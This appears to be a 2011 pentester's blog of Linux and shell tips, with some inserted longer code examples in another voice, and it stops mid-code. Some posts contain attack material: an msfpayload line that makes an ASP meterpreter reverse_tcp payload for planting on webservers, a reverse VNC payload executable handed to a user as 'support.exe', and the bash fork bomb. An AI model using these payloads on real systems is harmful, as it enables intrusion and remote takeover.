Most people know about uname -a to get a good amount of information. However, if you want an easy way to discover the distro/version you can run:
cat /etc/issue
The problem is that /etc/issue was never meant to keep track of the release version. So it may not exist on certain machines. I believe the most reliable method would be to:
cat /etc/*release
or
lsb_release -a
Sunday, December 25, 2011
Wednesday, December 14, 2011
Downloading DefCon Videos - The Easy Way
curl and wget are your friends.
The following commands will get you the download links for the different defcon videos they allow for download on their site.
Defcon 19
curl "http://defcon.org/html/links/dc-archives/dc-19-archive.html" | grep -o "https.*\.m4v"
Defcon 18
curl "http://defcon.org/html/links/dc-archives/dc-18-archive.html" | grep -o "https.*\.m4v"
Defcon 17
curl "http://defcon.org/html/links/dc-archives/dc-17-archive.html" | grep -o "https.*Video.*\.m4v\""
Defcon 16
curl "http://defcon.org/html/links/dc-archives/dc-16-archive.html" | grep -o "https.*m4v\"" | cut -d ' ' -f1 | tr -d '"'
Defcon 15
curl "http://defcon.org/html/links/dc-archives/dc-15-archive.html" | grep -o "http://media.*\.m4v"
Defcon 14
curl "http://defcon.org/html/links/dc-archives/dc-14-archive.html" | grep -o "https.*\.m4v"
Defcon 13
curl "http://defcon.org/html/links/dc-archives/dc-13-archive.html" | grep -o "https.*\.m4v"
Defcon 12
curl "http://defcon.org/html/links/dc-archives/dc-12-archive.html" | grep -o "https.*\.m4v"
Defcon 11
curl "http://defcon.org/html/links/dc-archives/dc-11-archive.html" | grep -o "https.*\.m4v"
Defcon 10
curl "http://defcon.org/html/links/dc-archives/dc-10-archive.html" | grep -o "https.*\.m4v"
Defcon 9
curl "http://defcon.org/html/links/dc-archives/dc-9-archive.html" | grep -o "https.*\.m4v"
Defcon 8
curl "http://defcon.org/html/links/dc-archives/dc-8-archive.html" | grep -o "https.*\.m4v"
Defcon 7
curl "http://defcon.org/html/links/dc-archives/dc-7-archive.html" | grep -o "https.*\.m4v"
Wednesday, November 30, 2011
Tuesday, November 29, 2011
Prepending text to a file
no mo' temp files
echo lol > rofl.txt
echo wut | cat - rofl.txt | tee rofl.txt > /dev/null
This makes cat concatenate first its stdin (the piped output from echo) and then the file you are prepending to, and that stdout goes to tee, which writes it back over the original file. Caveat: tee truncates rofl.txt the moment it opens it, so this is a race against cat reading the original; it usually works for a small file and can lose or corrupt data on a large one. Writing to a temp file and then mv-ing it over the original is the safe version.
Move running process to screen
ctrl+z #to suspend
bg #to background
screen retty $PID #to move the PID to screen
install retty using apt-get
Python & ruby saves json output
At first I was disgusted by JSON output. Then Python made it pretty. Thanks, Python.
cat t2.json | python -mjson.tool
You can do the same thing with Ruby, albeit with a longer command:
cat t2.json | ruby -e "require 'rubygems'; require 'json'; puts JSON.pretty_generate(JSON[STDIN.read]);"
Dumping GNU screen output
I like to have a copy of my screen sessions as a text file for future reference and reporting when I do my pentests.
While in screen, type C-a :hardcopy -h dumpofwindow1
This should create a file "dumpofwindow1" in the home dir.
You can view it with cat.
*-h dumps the entire scrollback buffer. It's important to remember that it's useless if you are in less or vi or something similar, since those programs run in the alternate screen and their output never enters the scrollback.
Wednesday, November 23, 2011
Understanding the BASH fork bomb
:(){ :|:& }
is a good old-fashioned troll against noobs in Linux. The above command basically sets up a function named ":". This trips up noobies because they don't quite get what that is; they don't realize that functions can be named almost anything, not just conventional names like myFunction().
The body of the function pipes the function into itself and backgrounds the pipeline, so every call spawns two more calls that each do the same, forever, using up all the process slots and memory on the machine extremely quickly. The funny part is that if they try to perform some action to free up resources, the function simply uses up those resources again. The defence is a per-user process limit (ulimit -u, or nproc in /etc/security/limits.conf), which caps how far it can spread.
It's a classic.
Ghetto locate
Some boxes don't have locate/updatedb on them for indexed searching of the filesystem. This sucks when you need to look for several files. You can create your own ghetto version with:
find / -print > filesystemlisting
and then grepping through that for your entries.
The find command just writes the name of every file on the filesystem to that file as an absolute path.
easy smeasy
Thursday, November 10, 2011
Forever Alone Teriyaki Egg Fried Rice
Serves one.
1/2 cup of rice
3/4 cup of water
2 eggs
teriyaki sauce
put the rice and water in your rice cooker. push button. wait. wait some more. when its done, wait 10 more minutes so it actually fucking softens. meanwhile waiting, go to stove. put oil in pan, turn on heat. meanwhile heating, crack eggs into bowl, beat, add some salt. pour eggs into pan, stir with the energy of a thousand suns. bam bitch you just made scrambled eggs. turn off heat, let eggs sit on warm stovetop until rice is done. scoop rice into bowl. scoop eggs into bowl. pour teriyaki sauce like a boss. FEED
Wednesday, November 9, 2011
ASP Encoded Meterpreter Payload
Here is the line to create a meterpreter payload output as an ASP page. Upload/include this into a webserver to have them call back to you:
msfpayload windows/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=4444 R | msfencode -t asp > lolwut.asp
Thursday, November 3, 2011
Parse .gnmap into separate files
I wanted each host line of my .gnmap file to be parsed into separate files with the ports as the contents, each port on a separate line. Below is the one-liner:
for i in `grep '^Host:' local1.gnmap | cut -d ' ' -f 2 | sort -u`; do grep "^Host: $i " local1.gnmap | awk 'BEGIN {FS=": "} {for(i=1;i<=NF;i++)print $i}' | grep open | awk 'BEGIN {FS="/, "} {for(i=1;i<=NF;i++)print $i}' >> $i; done
Replace local1.gnmap with the name of your gnmap file. This should produce output like so:
cat 192.168.5.254
22/open/tcp//ssh//Cisco SSH 1.25 (protocol 1.99)
23/open/tcp//telnet//Cisco router
443/open/tcp//ssl|http//Cisco IOS http config/
This may mean nothing to you, but for me, it's going to make grepping through recon SOOOO much simpler.
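As an added example (not the post's own one-liner), here is the same split done in a single awk pass over the file, so comment lines are ignored and each host is visited once. It assumes only a POSIX shell and awk; the two-host .gnmap sample and the output directory name are constructed here.

```shell
#!/bin/sh
# Added example: split an nmap greppable (.gnmap) file into one file per host,
# each listing that host's open ports one per line. Sample data is constructed.

gnmap_split() {
    # $1 = .gnmap file, $2 = output directory (must not exist yet, so stale
    # per-host files from an earlier run are never appended to)
    mkdir "$2" || return 1
    awk -F '\t' -v outdir="$2" '
        # Only "Host:" records carry data; "# Nmap ..." comment lines are skipped.
        /^Host: / {
            split($1, h, " "); host = h[2]            # "Host: 1.2.3.4 (name)" -> 1.2.3.4
            for (i = 2; i <= NF; i++) {
                if ($i !~ /^Ports: /) continue        # "Status: Up" records have no ports
                sub(/^Ports: /, "", $i)
                # Entries are separated by "/, "; nmap rewrites "/" inside version
                # strings as "|", so that separator cannot occur within an entry.
                n = split($i, p, "/, ")
                for (j = 1; j <= n; j++) {
                    sub(/\/$/, "", p[j])              # drop the trailing field slash
                    if (p[j] ~ /^[0-9]+\/open\//)     # keep open ports only
                        print p[j] >> (outdir "/" host)
                }
                close(outdir "/" host)
            }
        }' "$1"
}

write_sample_gnmap() {
    # Constructed two-host sample in nmap -oG layout (tab-separated fields).
    printf '%s\n' '# Nmap 5.51 scan initiated (constructed sample) as: nmap -oG local1.gnmap 192.168.5.0/24' > "$1"
    printf 'Host: %s ()\tStatus: Up\n' 192.168.5.254 >> "$1"
    printf 'Host: %s ()\tPorts: %s\tIgnored State: closed (996)\n' 192.168.5.254 \
        '22/open/tcp//ssh//Cisco SSH 1.25 (protocol 1.99)/, 23/open/tcp//telnet//Cisco router/, 443/open/tcp//ssl|http//Cisco IOS http config/, 8080/filtered/tcp//http-proxy///' >> "$1"
    printf 'Host: %s ()\tStatus: Up\n' 192.168.5.10 >> "$1"
    printf 'Host: %s ()\tPorts: %s\tIgnored State: closed (998)\n' 192.168.5.10 \
        '80/open/tcp//http//Apache httpd 2.2.3/, 3306/closed/tcp//mysql///' >> "$1"
    printf '%s\n' '# Nmap done (constructed sample) -- 256 IP addresses (2 hosts up) scanned' >> "$1"
}

run_sample() {
    # Writes the sample, splits it, and prints the output directory path.
    tmp=$(mktemp -d) || return 1
    write_sample_gnmap "$tmp/local1.gnmap"
    gnmap_split "$tmp/local1.gnmap" "$tmp/hosts" || return 1
    printf '%s\n' "$tmp/hosts"
}

# Demo: show what each per-host file contains.
dir=$(run_sample) && for f in "$dir"/*; do printf '== %s\n' "$f"; cat "$f"; done
```

The filtered and closed entries in the sample are dropped, so each per-host file is directly greppable for an open service.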
Monday, October 24, 2011
Grabbing external IP
There are NUMEROUS different ways of grabbing your external IP/other info. The way I prefer is using ifconfig.me.
curl ifconfig.me
my IP as reported by ifconfig.me
It also has multiple paths, like /ua for the user-agent string.
Go to http://ifconfig.me for the full list.
Friday, October 7, 2011
cURL line to post data to pastebin
TL;DR curl -d 'paste_code="she said wut wut, catsinthebutt"' 'http://pastebin.com/api_public.php'
You have to send a POST to http://pastebin.com/api_public.php with the data you want applied in the 'paste_code' attribute. In this case, "she said wut wut, catsinthebutt" is the thing that will be posted to pastebin.
Pipe that to pbcopy on a Mac and bam, your pastebin URL is in your pasteboard (yo dawg).
i said wut wut!
Friday, September 23, 2011
Debranding BackTrack 5
I love backtrack 5, so much so I want to customize it with my own wallpapers and splash screens and such. Below I will illustrate what you need to know to change:
1. The bootsplash image (the text only screen on top of the background, it will be the first one that comes up)
2. The plymouth image (the image that flashes on the screen for a few seconds before going back to the bootsplash image)
3. The wallpaper image (simplest to change, its the wallpaper on the desktop)
Firstly, the bootsplash image:
The bootsplash image is by far the hardest to modify because it takes quite a few steps, although it is simple in retrospect. BT5 uses a utility called "bootsplash" to generate the image that is behind the superimposed text window when you first boot up. This is the screen where you initially log in with the root:toor login, the same screen where you type startx to get into the GUI.
Bootsplash imagefiles are basically the original image with added metadata tagged onto it. This metadata is placed within the bootsplash imagefile using the splash utility along with a simple text config file. The current imagefile is located at /opt/bootsplash/bootsplash. In order to modify the bootsplash image, you must regenerate this file. You do this using the bootsplash utility "splash". This utility comes with the installation of the bootsplash utilities archive located below:
http://www.bootsplash.org/Userspace
Download, extract, and compile the utilities into some folder. Navigate to this folder and run "./splash" - you should receive the following output:
root@bt:~/temp/bootsplash-3.0.7/Utilities# ./splash
Usage: ./splash -s [-u unit] -n [cfgfile]
This means it should be working fine. So, like I said before, this splash utility requires one file as input, the config file (I will describe it below). This config file contains the metadata along with the location of the image to use.
----------------------
So let's start with the whole point of this: go get the jpg image you want to use as the background. Got it? Good. NOTE: the instructions I'm giving expect your file to be 1024x768 and 96 DPI. Now that you have your jpg file somewhere, you need to create a splash config file to go along with it. I have pasted my file below:
# config file version
version=3
# should the picture be displayed?
state=1
# fgcolor is the text foreground color.
# bgcolor is the text background (i.e. transparent) color.
fgcolor=7
bgcolor=0
# (tx, ty) are the (x, y) coordinates of the text window in pixels.
# tw/th is the width/height of the text window in pixels.
tx=80
ty=140
tw=865
th=560
# name of the picture file (full path recommended)
jpeg=/root/temp/tw/bootsplash.jpg
silentjpeg=/root/temp/tw/bootsplash.jpg
progress_enable=0
overpaintok=1
So as you can see above, you have to specify the path of the jpg along with the dimensions of the text box that the console output will be placed in (the dimensions MUST be within the limits of the image, otherwise it won't work). OK, so now you have the config pointing to the image. Now let's pass it to the splash utility to generate our bootsplash imagefile.
./splash -s -f /root/temp/tw/bootsplash-1024x768.cfg > /opt/bootsplash/bootsplash.fancy
cp /opt/bootsplash/bootsplash /opt/bootsplash/bootsplash.old-bt5
cp /opt/bootsplash/bootsplash.fancy /opt/bootsplash/bootsplash
The above commands generate the bootsplash imagefile, place it in /opt/bootsplash, backup the old one, and copy in the new one. This way, if you need to go back all you have to do is copy back the old file and continue.
Now you run "fix-splash" to copy the new file into the initrd. fix-splash is a bash script that the BT5 guys seem to have included to fix an old issue with splash fucking up for some reason.
Now reboot and enjoy :D
--------------------------------
Changing the Plymouth image:
This process is simpler. First, backup the old plymouth bt5 splash:
"cp /lib/plymouth/themes/simple/bt5_1024x768.png /lib/plymouth/themes/simple/bt5_1024x768.png.backup"
Now what I did was open the BT5 plymouth image in GIMP, paste my new image over it, and save it. I wasn't sure if there were any odd file-format issues I had to deal with, so I figured I wouldn't try to find out...
Now run "update-alternatives --config default.plymouth" and then "update-initramfs -u", reboot, and everything will look fucked up. Log in as root, run "fix-splash" like before, reboot, and now it should be fixed.
-------------------------------
Changing the wallpaper image:
This is the simplest:
"gconftool-2 --type string --set /desktop/gnome/background/picture_filename /root/Desktop/wp.jpg"
Bam. That should be an instant change.
Have fun, and if anything doesn't work try Google first, then message me ;D
Thursday, September 22, 2011
Psychological Porno
I have always had spouts of ideas/revelations/epiphanies since I can remember, and they were always gone once I had them. Only recently have I decided to start recording said ideas. It's simple: I downloaded a voice recorder app on my phone, and when I get an awesome new invention idea, or a philosophical idea, or when I start ranting, I hit the record button.
There are several benefits to doing this:
1. You can hear yourself (effectively) from an outside perspective once enough time has passed. This is awesome since you can't remember exactly what you were thinking at that point, so you hear yourself the exact way others do. This is a very rare experience that I believe would benefit anyone.
2. You have a record of your ideas for the future, immortalized in digital media; you can copy and share that shit anywhere. Although, I would be very careful who you share your ideas and secrets with. People could exploit the things you hold dearest, and that could seriously fuck with you.
3. The third is what I like to call psychological porno. I call it that because playing back your hopes/dreams/realizations/etc after a long span of time really brings you back to the person you wish to be. Everyone strays from that person from time to time, but it's important for us to be able to realize what path we wanted to take in the first place.
Thursday, September 8, 2011
GNU screen and osx mouse scrolling
I use a mac. I use screen. I want mac mouse scrolling in screen. This is how I do it:
My main gripe with screen is its scrollback buffer. As a pentester, the output I receive is obviously incredibly important, so an easy way to view it is imperative. Apparently there is a way to hack mouse scrolling into Terminal. Basically it utilizes a plugin written for a scripting agent (SIMBL) that hooks into Terminal.app.
1. install SIMBL: http://www.culater.net/software/SIMBL/SIMBL.php
2. install MouseTerm: https://bitheap.org/mouseterm/
3. restart terminal, make sure "send mouse events" is checked in the "shell" menu option.
4. start screen
5. ???
6. profit
Basically it's a plugin that converts the scroll movement of your mouse/touchpad into up/down arrow keys and sends those to the terminal. This effectively allows you to scroll through screen's scrollback buffer quickly by flicking your fingers.
awwwww yeahhhhh
Monday, August 1, 2011
How to wget/curl UPS tracking page
One of my job functions is to keep track of many servers out in the field. So I decided to make my life easy and create a script that will automatically track the shipping status of the servers. Luckily, this is very easy to accomplish:
simply curl or wget the following page and parse out the sections you want.
http://wwwapps.ups.com/WebTracking/processInputRequest?TypeOfInquiryNumber=T&InquiryNumber1=1Z000000000000
Where '1Z000000000000' is your tracking number.
Once I get my script fully completed I will post it here.
Wednesday, July 27, 2011
Meterpreter VNC payload for IT support
So, the first place that ever got me a job was this small independent UPS store in Chicago. They had no tech person whatsoever and nobody was really technically inclined. I got a job as a normal associate. I saw that they had multiple technical issues, and I recognized the fact that I could solve them. So I stepped up and started taking care of all of their tech issues (Remember: I wasn't hired to do any of that). I became their IT administrator for their 4 stores. I handled everything they needed and some things I thought they should have.
Long story short, I moved on to multiple other jobs that were more tech focused. But they are now without a tech person. Incidentally, I'm still their tech person lol. They call me all the time to help with some printer or network connection or driver issue or some other IT support issue. I had set up LogMeIn accounts for most of the machines when I worked for them. But this was a long time ago and they got wiped out several times. ENTER THE BLACKHAT SOLUTION.
I figure: hey, if I can get passwords and credit cards from multi-billion dollar corporations, getting a VNC session to some shitty POS behind a nat should be flippin' easy.
It is. Here's how:
Tech Support via Metasploit:
I'm assuming you already have MSF and Apache installed and working properly on your machine. If you don't, google it, it's easy to do.
1. generate the VNC payload with the proper settings to connect back:
msfpayload windows/vncinject/reverse_tcp LHOST=myvps.com X > /var/www/support.exe
2. start the multihandler on your VPS to listen for the VNC connection
msfconsole
use exploit/multi/handler
set PAYLOAD windows/vncinject/reverse_tcp
set LHOST myvps.com
exploit
3. tell your person to go to myvps.com/support.exe and run the executable. The VNC payload should connect back to your VPS and you should get output similar to the following:
msf exploit(handler) > exploit
[*] Started reverse handler on 1.1.1.1:4444
[*] Starting the payload handler...
[*] Sending stage (445440 bytes) to 2.2.2.2
[*] Starting local TCP relay on 127.0.0.1:5900...
[*] Local TCP relay started.
[-] Failed to launch vncviewer. Is it installed and in your path?
[*] Session 2 created in the background.
4. I do everything via the command line, so I have to forward the localhost-only port to an internet-accessible one using SSH, like this:
ssh -L :5901:localhost:5900 username@localhost
5. Now run netstat -ntlp to make sure 5901 is listening on the public interface (0.0.0.0). Anything that can reach 5901 on that interface reaches the VNC session, so firewall it to your own address, or skip the public bind and tunnel from your workstation to the VPS (ssh -L 5901:localhost:5900 username@myvps.com) instead.
6. Now use a VNC client to connect to your VPS on port 5901 (Chicken of the VNC: set the "display" to 1).
7. BAM, you should have their desktop now.
If you have any questions, just ask.
Wednesday, July 6, 2011
FUCK i love grep
grep -o has saved me soooo many times.
Here is an example of it; I am using curl to grab the last 5 links from a twitter page:
curl http://twitter.com/statuses/user_timeline/pastebinleaks.xml?count=5 -s | grep "<text>" | sed 's/.*<text>\(.*\)<\/text>.*/\1/' | grep -o "http://pastebin.* "
Without the grep -o section, it would simply return the tweet as one line, with you needing to pull out the links somehow.
Just be careful, because I discovered that twitter only allows you to pull 150 tweets in an hour on some accounts.
Sunday, June 12, 2011
Thank you for visiting our site! You must register an account to breathe. Would you like our newsletter?
Here's an idea: create an alternate persona you use for all those bajillion accounts. Website got hacked? Pfft, big deal, you got my bullshit account, grats.
Seriously, take a second and think up a new identity:
-Name
-Address
-Occupation
-Salary
-Password
-Wife? Kids? pet? mistress? mistress!
This is your new account, grats, use it with peace of mind.
Saturday, June 11, 2011
Changing GNU Screen's Escape Sequence
It seems kind of dumb to me for several different programs to have the same escape sequence. Ever tried to use minicom in a screen session? Or try to go to beginning of line in bash? Not fun.
You have to modify your .screenrc file to have the following line:
escape escapekey metakey
I changed mine to C-` (backtick). So my escape line looks like this:
escape ^``
I got the information from here:
http://ubuntuforums.org/archive/index.php/t-498675.html
MS08-067 Affected Machines
Microsoft's account of affected version of windows. Handy to have.
http://www.microsoft.com/technet/security/bulletin/ms08-067.mspx
Don't Be A Prick
There is an attitude that is very prevalent in the infosec community. That is arrogance. People who have been told too many times that they are "uber smart leet hackers", and this praise creates an aura that repulses anyone who can see past the facade. Here is a simple idea to ponder on: Arrogance = insecurity + fear.
These people's greatest fear is to be regarded as normal. They are terrified at the thought of their people not respecting them. They fear the judgments of others. And that, my friends, is why an arrogant person is the weakest form. A meek individual may be scared of what others think, but at least they won't throw someone in front of a bus to show their muscles.
So let me end on a few simple notes. There was a time you knew nothing; that time has never gone away. Your pride simply outgrew your knowledge. If you are looking for a dose of modesty, then here is a spoonful:
One day, everything you know, everything you have, and everything you love will be gone. On that day, there will only be one thing that remains; your memory. You better make DAMN sure that memory of you is a good one. That is your heaven. That is your hell. That is your soul.
Imagine if there was no more tomorrow for you; everyone else goes on, but you don't. Your possessions get divided up and taken by others. Your loved ones will move on and concern themselves with someone else. But there is one thing that remains in the minds of everyone. Your influence, your ideals, your philosophies carry on in those who cared. Those who were touched by your mind. Touched in a positive way, not an arrogant, self-serving, or egotistical way. Not a way that makes people feel like an idiot or a moron that doesn't deserve his own voice.
Next time you are faced with a situation in which you can raise someone up or bring them down, remember the truth of your life - that it ends.
Wednesday, June 8, 2011
uniq not working? yes it is
Remember this simple fact and you won't feel like an idiot (like I did about 10 minutes ago). Let's say you have a text file with the following:
cats
cats
If you run that file through sort -u you will get the exact same output. Sound crazy? Yeah, that's what I thought, until you see the invisible: whitespace. The second "cats" has a space after it. The trailing space makes that line completely different from the previous "cats".
Use the following line to eliminate the whitespace (it strips every space on every line, not just trailing ones, which is fine for a one-entry-per-line list):
sed 's/ //g' filename
Now, run it through sort -u and be a happy camper.
kthnxbai
Monday, May 23, 2011
Removing leading whitespace from file
Sometimes clients like to annoy me and send IPs in a "fancy" format with tabs and space and crap..ugh. I'm a one entry per line kind of guy. So I paste the entries into vim and I want to get rid of leading whitespace. This is the command in vim:
:%s/^\s*//g
EXPLAIN THIS BULLSHIT:
vim has sed-like regex recognition. This command tells vim to run a substitution on every line (%s), matching lines beginning (^) with a whitespace character (\s) and including any further whitespace directly after the first one (*). Next, replace the match with nothing (//). Now do this globally (g). By default, it will only replace the first match on each line; g means "do this globally" (with the ^ anchor there is only ever one match per line, so g is harmless here).
Thursday, May 19, 2011
Add Timestamps to bash history
Found the solution here:
http://linux.byexamples.com/archives/467/list-command-line-history-with-timestamp/
TL;DR
add:
export HISTTIMEFORMAT="%F %T "
to your .bash_profile
Monday, May 9, 2011
Ghetto-ized IP address range generator
Once I got my head out of my ass, I figured out an uber easy way to generate and sort a long list of IP addresses:
printf '%s\n' 192.168.{1..255}.{1..255} #generates the actual IPs using Bash brace expansion, one per line with no stray whitespace
sort -t . -k 1,1n -k 2,2n -k 3,3n -k 4,4n #sorts the IPs into the proper order (optional; brace expansion already emits them in order)
>> hosts # output to file!
end result:
printf '%s\n' 192.168.{1..255}.{1..255} | sort -t . -k 1,1n -k 2,2n -k 3,3n -k 4,4n >> hosts
The only thing you would need to edit would be the printf line to match the range you are trying to generate.
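Three of the posts above (the uniq trailing-space gotcha, stripping leading whitespace in vim, and this range generator with its numeric sort) are the same problem seen from different angles: a pasted list of IPs needs its whitespace normalised, its duplicates dropped, and a numeric rather than string sort. This added example (mine, not the blog's) does all three in Python with the standard ipaddress module and generalises the {1..255} brace expansion to an arbitrary start/end pair. SAMPLE_LIST is a constructed input and the function names are my own.

```python
import ipaddress

# Constructed sample of the "fancy" format the post complains about: tabs, leading spaces,
# a trailing space (the uniq gotcha), an exact duplicate and a stray non-IP line.
SAMPLE_LIST = "\t192.168.1.10\n  192.168.1.2 \n192.168.1.10\n10.0.0.5\nhostname\n\t 192.168.1.100\n"


def normalize_ip_list(text):
    """Strip surrounding whitespace from every line (what the sed and vim commands do),
    drop blanks, non-addresses and duplicates, and sort numerically.

    A plain string sort would put 192.168.1.10 before 192.168.1.2, which is why the
    shell version needs sort -t . -k 1,1n ...; ip_address objects compare by value."""
    seen = set()
    for line in text.splitlines():
        token = line.strip()          # leading tabs/spaces and trailing spaces both go
        if not token:
            continue
        try:
            seen.add(ipaddress.ip_address(token))
        except ValueError:
            continue                   # not a bare IP address: skip it
    # sort IPv4 before IPv6, then by numeric value within each family
    return [str(ip) for ip in sorted(seen, key=lambda ip: (ip.version, ip))]


def generate_range(start, end):
    """Every IPv4 address from start to end inclusive, already in numeric order.
    Generalises the 192.168.{1..255}.{1..255} brace expansion to any start/end pair."""
    lo = int(ipaddress.IPv4Address(start))
    hi = int(ipaddress.IPv4Address(end))
    if lo > hi:
        raise ValueError("start address is above end address")
    return [str(ipaddress.IPv4Address(n)) for n in range(lo, hi + 1)]


if __name__ == "__main__":
    for ip in normalize_ip_list(SAMPLE_LIST):
        print(ip)
```

Feed normalize_ip_list the raw clipboard contents and write the result to your hosts file; generate_range crosses octet boundaries correctly (192.168.1.254 through 192.168.2.1 gives four addresses), which the brace-expansion form cannot do in one expression.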
Thursday, May 5, 2011
SSH and GatewayPorts configuration
I love SSH, like a lot, but I was having a problem with it lately. Specifically, the problem was with the security of remote forwarded ports (-R). I was told that by default SSH only allows remote ports to be bound to the local interface for security reasons. I understand that, completely. The problem is that I wanted to be able to use my VPS's SSH connections like a bouncer. I wanted to be able to type:
ssh account@vpsserver.net -p2222
and have the connection go through vpsserver into the server behind it. In effect, making vpsserver a type of central hub for reverse SSH connections. You can think of it almost like a ghetto botnet.
I found out that all I had to do was change GatewayPorts to "yes" in /etc/ssh/sshd_config and it would work if I issued the following command on the BACK server.
ssh account@vpsserver.net -R 2222:localhost:22
All was well with the world for a while. Then my paranoia started sinking in. I didn't want someone to portscan my VPS and see that I have 20 different ports open from reverse SSH connections. What was I to do? Well, it turns out that GatewayPorts has 3 different settings: yes, no, and clientspecified.
no (default) = force remote port forwardings to only be accessible to localhost
yes = force remote port forwardings onto the public interface (technically no, but in essence that's what it does)
clientspecified = the client decides which to choose
So I changed GatewayPorts to clientspecified and experimented. If you typed the remote forward command we typed in earlier:
ssh account@vpsserver.net -R 2222:localhost:22
we would get a port remotely bound to vpsserver's localhost address. This would force you to first log into the VPS and then log into port 2222 on localhost.
BUT, if you want the port to be bound publicly on vpsserver, it only takes 1 more character. Pay attention closely:
ssh account@vpsserver.net -R :2222:localhost:22
Notice that ":" in front of the 2222? That essentially tells ssh to bind it to the public interface*.
Now I have two very similar commands to do two importantly different things. I am a happy camper.
*Technically it tells SSH to bind it to all interfaces, which consequently includes the external-facing one :)
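After switching to clientspecified, the thing worth verifying on the VPS is which forwarded ports actually ended up on a wildcard address, since those are exactly what a port scan sees. This added example (not from the post) parses `ss -ltn` output and lists the listening ports bound to 0.0.0.0, * or [::]; SAMPLE_SS_OUTPUT is constructed to mimic the vpsserver setup and the function names are mine.

```python
# Constructed `ss -ltn` sample on a host like the post's vpsserver: 2222 and 2224 were
# forwarded the default way (loopback only), 2223 and 2225 with the leading ":" form.
SAMPLE_SS_OUTPUT = """\
State   Recv-Q  Send-Q  Local Address:Port   Peer Address:Port
LISTEN  0       128     127.0.0.1:2222       0.0.0.0:*
LISTEN  0       128     0.0.0.0:2223         0.0.0.0:*
LISTEN  0       128     [::1]:2224           [::]:*
LISTEN  0       128     *:2225               *:*
LISTEN  0       128     0.0.0.0:22           0.0.0.0:*
"""

WILDCARD_ADDRESSES = {"0.0.0.0", "*", "[::]", "::"}


def parse_listeners(ss_output):
    """(address, port) for every LISTEN line; the local address is column 4 and the
    port is whatever follows the last ':' (so bracketed IPv6 addresses work)."""
    listeners = []
    for line in ss_output.splitlines():
        fields = line.split()
        if len(fields) < 5 or fields[0] != "LISTEN":
            continue
        addr, _, port = fields[3].rpartition(":")
        listeners.append((addr, int(port)))
    return listeners


def exposed_ports(ss_output, expected=frozenset({22})):
    """Ports bound to a wildcard address that are not in `expected`: the set a port
    scan of the VPS would turn up, which is what the post wanted to keep small."""
    return sorted(port for addr, port in parse_listeners(ss_output)
                  if addr in WILDCARD_ADDRESSES and port not in expected)


if __name__ == "__main__":
    import sys
    print(exposed_ports(sys.stdin.read()))
```

Pipe real output in with `ss -ltn | python3 thisfile.py`; anything printed besides the ports you meant to expose with the ":" form is a forward that should have been bound to loopback.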
vi & vim acting up
Ever just fire up a fresh VM or log into a box and try to edit a file with vi, and the backspace/arrow keys act up? It happened to me, and I noticed it was because there was no .vimrc file.
Simply copying the default one over to my dir fixed my problem:
cp /etc/vim/vimrc ~/.vimrc
Now vi & vim behave again...
Sunday, April 24, 2011
Use Pandora? You'll want Pianobar
I love Pandora.com; it provides me the majority of my new music selections/artists. The problem is that Pandora has a few usability issues (with good reason). Pianobar is a command line tool that will log in to Pandora, grab your playlists, and play any one you want. And it has a feature that makes it all worth it: infinite skips.
Here is the install site:
https://github.com/PromyLOPh/pianobar
Install it. I have it on every machine that I listen on; it's awesome.
The following is the output of the menu command that outlines a lot of what the program does:
+ love song
- ban song
a add music to station
c create new station
d delete station
e explain why this song is played
g add genre station
h song history
i print information about song/station
j add shared station
m move song to different station
n next song
p pause/continue
q quit
r rename station
s change station
t tired (ban song for 1 month)
u upcoming songs
x select quickmix stations
b bookmark song/artist
( decrease volume
) increase volume
= delete seeds/feedback
as you can see, it is versatile.
Google Ruby Script
My friend coded this for our team. It will take a Google search query and parse out the returned URLs, one per line. It comes in handy for scripting recon on a client. Obviously you need the nokogiri gem installed.
I hope you find it useful...
#!/usr/bin/ruby
require 'rubygems'
require 'nokogiri'
require 'open-uri'
require 'cgi'

# Perform a google search and print each result URL on its own line
abort "usage: #{$0} <query>" if ARGV[0].nil?
query = CGI.escape(ARGV[0])   # URL-encode the query so spaces and symbols survive
# Add numbers in increments of 10 to the array to search more pages
[0].each do |num|
  # open-uri's URI.open (Kernel#open was removed from open-uri in Ruby 3)
  doc = Nokogiri::HTML(URI.open('http://google.com/search?q=' + query + '&start=' + num.to_s))
  puts "Scrubbing Google for good-ness"
  doc.xpath('//h3/a[@class="l"]').each do |link|
    temp = link.attribute("href")
    puts temp
  end
end
Organizing my /gif
I have accumulated MANY gif files over the years. The problem is a gif can be either static or animated. I wanted all my animated gifs in one folder. After a little research on Wikipedia I discovered that the original GIF specification didn't allow for animation. GIFs that animate have a header containing the value "NETSCAPE2.0". Knowing this, it was trivial to sort animated vs. static gifs, as shown in the following bash one-liner:
mkdir -p animooted_gifs; for i in *; do [ -f "$i" ] || continue; if grep -q 'NETSCAPE2.0' "$i"; then mv "$i" animooted_gifs/; fi; done
Lol, I was creating this nice long script that would do checks and verifications and all that crap... meh... one-liner ftw...
A little explanation:
A search through Wikipedia taught me that animated GIFs should contain a certain header value: "NETSCAPE2.0". The bash line loops over every regular file in the directory, greps the file for the header NETSCAPE2.0, and moves matching files to the animooted_gifs directory. If it doesn't detect NETSCAPE2.0, it moves on to the next file.
Running the unix util "file" on the gifs doesn't yield much. As you can see below, a static gif and an animated gif report the same properties (obviously the size will be different since they are two different gifs):
gifs/1266641860129.gif: GIF image data, version 89a, 1003 x 1217
gifs/1245733506951.gif: GIF image data, version 89a, 375 x 375
BUT, if you run strings through the files you will see something different:
$ strings 1245733506951.gif
GIF89aw
33 84...
$ strings 1245733506951.gif
GIF89aw
33 84
...
NETSCAPE2.0
...
If you have been paying attention, you will know which file is the animated one (hint: it's the 2nd one).
NOTE: Some files are constructed oddly for some reason and don't have the NETSCAPE2.0 header even though they are animated. I have found this to be a rare exception to the rule. In any case, my one-liner should sort the vast majority of the animated GIFs into the correct location.
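The one-liner keys on the NETSCAPE2.0 marker, and the NOTE above admits some animated files lack it: that marker lives in an optional Netscape application extension block that sets the loop count, while animation itself is simply more than one image descriptor in the file. This added example (mine, not from the post) walks the GIF block structure and counts frames, so it catches the edge case the grep misses. The three sample GIFs are constructed inline with a placeholder LZW sub-block in place of real pixel data, and the function names are my own.

```python
import struct

# --- constructed sample GIFs (not real images: a placeholder LZW sub-block stands in for pixels) ---
HEADER = b"GIF89a" + struct.pack("<HHBBB", 1, 1, 0x80, 0, 0) + b"\x00\x00\x00\xff\xff\xff"
# 0x80 in the packed byte: global colour table present, size field 0 -> 2 entries x 3 bytes
NETSCAPE_EXT = b"\x21\xff\x0bNETSCAPE2.0" + b"\x03\x01\x00\x00" + b"\x00"   # loop-count sub-block, terminator
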